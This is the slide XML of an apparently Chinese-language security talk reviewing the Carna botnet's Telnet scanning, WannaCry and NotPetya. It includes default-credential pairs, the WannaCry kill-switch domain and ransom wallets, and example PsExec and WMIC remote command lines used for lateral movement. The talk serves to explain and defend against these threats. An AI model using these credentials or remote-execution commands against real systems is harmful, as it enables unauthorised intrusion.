                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzPct val="82000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>部署挑战</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="463422" indent="-463422" algn="l" defTabSz="519937">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzPct val="82000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>任务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="463422" indent="-463422" algn="l" defTabSz="519937">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzPct val="82000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>展示</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="463422" indent="-463422" algn="l" defTabSz="519937">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzPct val="82000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>统计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架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架构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Bo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7627" indent="-317627" defTabSz="356362">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:defRPr sz="2806"/>
            </a:pPr>
            <a:r>
              <a:t>Bot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635254" lvl="1" indent="-317627" defTabSz="356362">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:defRPr sz="2806"/>
            </a:pPr>
            <a:r>
              <a:t>Buildroot交叉编译成9个不同CPU架构</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635254" lvl="1" indent="-317627" defTabSz="356362">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:defRPr sz="2806"/>
            </a:pPr>
            <a:r>
              <a:t>纯C编写，编译后，46-60k大小</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="317627" indent="-317627" defTabSz="356362">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:defRPr sz="2806"/>
            </a:pPr>
            <a:r>
              <a:t>后端</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635254" lvl="1" indent="-317627" defTabSz="356362">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:defRPr sz="2806"/>
            </a:pPr>
            <a:r>
              <a:t>PHP Web接口+数据库记录Botnet状态</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635254" lvl="1" indent="-317627" defTabSz="356362">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:defRPr sz="2806"/>
            </a:pPr>
            <a:r>
              <a:t>Python脚本进行Botnet运维操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635254" lvl="1" indent="-317627" defTabSz="356362">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:defRPr sz="2806"/>
            </a:pPr>
            <a:r>
              <a:t>Hadoop进行大数据分析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EEE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EEEE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128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2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191" y="2407814"/>
            <a:ext cx="12898418" cy="72644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Bot行为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Bot行为</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Telnet扫描植入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6145" indent="-406145" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3500"/>
              </a:spcBef>
              <a:defRPr sz="3587"/>
            </a:pPr>
            <a:r>
              <a:t>Telnet扫描植入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="812291" lvl="1" indent="-406145" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3500"/>
              </a:spcBef>
              <a:defRPr sz="3587"/>
            </a:pPr>
            <a:r>
              <a:t>root:root, admin:admin, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="812291" lvl="1" indent="-406145" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3500"/>
              </a:spcBef>
              <a:defRPr sz="3587"/>
            </a:pPr>
            <a:r>
              <a:t>128并发、12秒超时、10个IP/秒</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="406145" indent="-406145" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3500"/>
              </a:spcBef>
              <a:defRPr sz="3587"/>
            </a:pPr>
            <a:r>
              <a:t>限制危害</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="812291" lvl="1" indent="-406145" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3500"/>
              </a:spcBef>
              <a:defRPr sz="3587"/>
            </a:pPr>
            <a:r>
              <a:t>不扫内网、不驻留、不提权、不干扰Watchdog、异常就退出、留下Readme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&amp;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C&amp;C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="无回连C&amp;C，调度主动去连接每个Bo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无回连C&amp;C，调度主动去连接每个Bot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>近1000个性能不错的中间节点</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Bots不断更新，85%的稳定度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扫描方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扫描方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="ICMP p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1592" indent="-291592" defTabSz="327152">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2576"/>
            </a:pPr>
            <a:r>
              <a:t>ICMP ping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="583184" lvl="1" indent="-291592" defTabSz="327152">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2576"/>
            </a:pPr>
            <a:r>
              <a:t>修改版fping，探测6周，520亿记录，每几天完整一轮</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291592" indent="-291592" defTabSz="327152">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2576"/>
            </a:pPr>
            <a:r>
              <a:t>Reserve DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="583184" lvl="1" indent="-291592" defTabSz="327152">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2576"/>
            </a:pPr>
            <a:r>
              <a:t>修改版的libevent异步，105亿记录，跑了好几轮</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291592" indent="-291592" defTabSz="327152">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2576"/>
            </a:pPr>
            <a:r>
              <a:t>Nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="583184" lvl="1" indent="-291592" defTabSz="327152">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2576"/>
            </a:pPr>
            <a:r>
              <a:t>裁剪后的Nmap，同步扫描之前做存活探测，1-65535端口全探测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="291592" indent="-291592" defTabSz="327152">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2576"/>
            </a:pPr>
            <a:r>
              <a:t>Service Probes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="583184" lvl="1" indent="-291592" defTabSz="327152">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2576"/>
            </a:pPr>
            <a:r>
              <a:t>Nmap的nmap-service-probes文件，85个服务探针，超时判断尝试30次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植入情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植入情况</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="120万可以执行ifconfig，收集了MAC信息，可以以此识别设备类型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4665" indent="-494665" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4370"/>
            </a:pPr>
            <a:r>
              <a:t>120万可以执行ifconfig，收集了MAC信息，可以以此识别设备类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="494665" indent="-494665" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4370"/>
            </a:pPr>
            <a:r>
              <a:t>运行在42万设备上</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="494665" indent="-494665" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4370"/>
            </a:pPr>
            <a:r>
              <a:t>有数十万设备没Shell，没法上传</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="494665" indent="-494665" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4370"/>
            </a:pPr>
            <a:r>
              <a:t>近十万设备太小不合适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部署挑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部署挑战</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="在一些设备上发现Aidra Bo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4665" indent="-494665" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4370"/>
            </a:pPr>
            <a:r>
              <a:t>在一些设备上发现Aidra Bot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="989330" lvl="1" indent="-494665" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4370"/>
            </a:pPr>
            <a:r>
              <a:t>DDoS、IRC C&amp;C、仅wget、250KB、很多设备重启会清空这些</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="989330" lvl="1" indent="-494665" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4370"/>
            </a:pPr>
            <a:r>
              <a:t>持久化感染了Dreambox及一些MIPS平台</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="494665" indent="-494665" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4370"/>
            </a:pPr>
            <a:r>
              <a:t>用iptables来屏蔽Aidra Bot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任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任务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="整个IPv4空间拆分成240k子任务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整个IPv4空间拆分成240k子任务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>通过part id来唯一区分，开始IP到结束IP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52297" y="2208398"/>
            <a:ext cx="5050296" cy="7343404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展示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展示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="希尔伯特曲线形式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4904" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>希尔伯特曲线形式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>世界地图形式，基于GeoIP库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>表格形式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="749808" lvl="1" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>展示根、域名、子域名、子子域名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>列表形式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="749808" lvl="1" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>内容最为丰富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4亿2千万IP响应了至少两次的ICMP ping请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4904" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>4亿2千万IP响应了至少两次的ICMP ping请求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>1亿6千5百万IP至少开放了TOP150端口的一个</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>仅有closed/reset端口的1亿4千1百万IP没响应ICMP ping请求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>10亿5千1百万IP可以得到Reverse DNS记录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="749808" lvl="1" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>其中有7亿2千9百万IP什么响应都没</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>4.2+1.41+7.29~=13亿属于曾经使用过的IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="统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统计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对了"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="5689600"/>
            <a:ext cx="10464800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>对了</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Carna Botnet由一个人耗时一年搞定"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="4089400"/>
            <a:ext cx="10464800" cy="774701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Carna Botnet由一个人耗时一年搞定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全球完美收割的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全球完美收割的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>WannaCry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277803" y="3202935"/>
            <a:ext cx="2273916" cy="2245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7" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750199" y="2818711"/>
            <a:ext cx="1277847" cy="1262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8" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7880271" y="5764971"/>
            <a:ext cx="1277847" cy="1262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9" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8841372" y="3694816"/>
            <a:ext cx="1277847" cy="1262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0" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4872666" y="5838158"/>
            <a:ext cx="871681" cy="860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1" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9044455" y="2521129"/>
            <a:ext cx="871681" cy="860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现在在做的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现在在做的事</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Joinsec，安全，唯快不破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2595" indent="-442595" defTabSz="496570">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="3910"/>
            </a:pPr>
            <a:r>
              <a:t>Joinsec，安全，唯快不破</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="442595" indent="-442595" defTabSz="496570">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="3910"/>
            </a:pPr>
            <a:r>
              <a:t>怪物能力中心：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="885190" lvl="1" indent="-442595" defTabSz="496570">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="3910"/>
            </a:pPr>
            <a:r>
              <a:t>全球网络空间探索引擎，内部代号（MOOZ/墨子）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="885190" lvl="1" indent="-442595" defTabSz="496570">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="3910"/>
            </a:pPr>
            <a:r>
              <a:t>APT攻防对抗培训，内部代号（KOOZ/孔子）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="885190" lvl="1" indent="-442595" defTabSz="496570">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:defRPr sz="3910"/>
            </a:pPr>
            <a:r>
              <a:t>APT攻防对抗武器库，内部代号（ZOOZ/诸子）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经典画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经典画面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304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400" y="3003550"/>
            <a:ext cx="7620000" cy="5753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4450" y="2292350"/>
            <a:ext cx="10375900" cy="7175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惊世骇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惊世骇俗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="2017.4.13，NSA方程式组织被ShdowBrokers泄露第三批武器，其中一颗“原子弹”是“永恒之蓝”（EternalBlue）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4489" indent="-364489" defTabSz="408940">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="3220"/>
            </a:pPr>
            <a:r>
              <a:t>2017.4.13，NSA方程式组织被ShdowBrokers泄露第三批武器，其中一颗“原子弹”是“永恒之蓝”（EternalBlue）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="364489" indent="-364489" defTabSz="408940">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="3220"/>
            </a:pPr>
            <a:r>
              <a:t>2017.5.12，永恒之蓝的收尾工作被WannaCry完美解决...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="728979" lvl="1" indent="-364489" defTabSz="408940">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="3220"/>
            </a:pPr>
            <a:r>
              <a:t>其实这之前，已经不少勒索蠕虫这样干了</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="364489" indent="-364489" defTabSz="408940">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="3220"/>
            </a:pPr>
            <a:r>
              <a:t>普遍认为这是朝鲜黑客所干，一次全球实战演练而已</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="364489" indent="-364489" defTabSz="408940">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="3220"/>
            </a:pPr>
            <a:r>
              <a:t>一切细节：</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/WannaCry_ransomware_attack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插曲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插曲</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="蠕虫对抗插曲：Kill switch对抗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蠕虫对抗插曲：Kill switch对抗</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com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比特币钱包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比特币钱包</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="115p7UMMngoj1pMvkpHijcRdfJNXj6LrL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115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw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一种态势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一种态势</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318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448" y="3177684"/>
            <a:ext cx="4787901" cy="642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90420" y="2402669"/>
            <a:ext cx="6781801" cy="66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41138" y="2102502"/>
            <a:ext cx="7023101" cy="6235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 animBg="1" advAuto="0"/>
      <p:bldP spid="320" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="321" grpId="0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勒索加密细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勒索加密细节</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="两套RSA公私钥+N套A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两套RSA公私钥+N套AES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>细节见：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>http://www.antiy.com/response/wannacry.html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携带内网渗透技巧的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携带内网渗透技巧的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>NotPetya</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277803" y="3202935"/>
            <a:ext cx="2273916" cy="2245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8" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750199" y="2818711"/>
            <a:ext cx="1277847" cy="1262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9" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7880271" y="5764971"/>
            <a:ext cx="1277847" cy="1262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0" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8841372" y="3694816"/>
            <a:ext cx="1277847" cy="1262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1" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4872666" y="5838158"/>
            <a:ext cx="871681" cy="860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2" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9044455" y="2521129"/>
            <a:ext cx="871681" cy="860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经典画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经典画面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335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3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" y="2324100"/>
            <a:ext cx="12192000" cy="711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特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特点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="2017.6.27爆发，首发乌克兰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2017.6.27爆发，首发乌克兰</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>比WannaCry更近一步，用到了内网渗透技巧</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>mimikatz、PsExec及WMIC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>这些很多时候可以无视补丁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Mimikatz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Mimikatz</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342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4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600" y="2032000"/>
            <a:ext cx="11277600" cy="7696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分享内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分享内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="一些背景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一些背景</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>蠕虫进化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>对抗思路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sExe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PsExec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="PsExec，微软自家小工具，属于Sysinternals家族，默认没安装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5493" indent="-515493" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="4500"/>
              </a:spcBef>
              <a:defRPr sz="4554"/>
            </a:pPr>
            <a:r>
              <a:t>PsExec，微软自家小工具，属于Sysinternals家族，默认没安装</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515493" indent="-515493" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="4500"/>
              </a:spcBef>
              <a:defRPr sz="4554"/>
            </a:pPr>
            <a:r>
              <a:t>远程命令示例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1030986" lvl="1" indent="-515493" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="4500"/>
              </a:spcBef>
              <a:defRPr sz="4554"/>
            </a:pPr>
            <a:r>
              <a:t>psexec.exe \\&lt;Server&gt; -u admin -p &lt;Password&gt; -i 2 cmd /c “c:\Users\admin\Desktop\test.exe”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WMI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WMIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="WMIC(Windows Management Instrumentation Command)，基本默认就有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WMIC(Windows Management Instrumentation Command)，基本默认就有</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>远程命令示例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>wmic /node:192.168.1.10 /user:administrator /password:123456 process call create cmd.exe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其他特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其他特点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Kill switch是：perfc.dat文件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4665" indent="-494665" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4370"/>
            </a:pPr>
            <a:r>
              <a:t>Kill switch是：perfc.dat文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="989330" lvl="1" indent="-494665" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4370"/>
            </a:pPr>
            <a:r>
              <a:t>路径：C:\Windows\perfc.dat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="494665" indent="-494665" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="4300"/>
              </a:spcBef>
              <a:defRPr sz="4370"/>
            </a:pPr>
            <a:r>
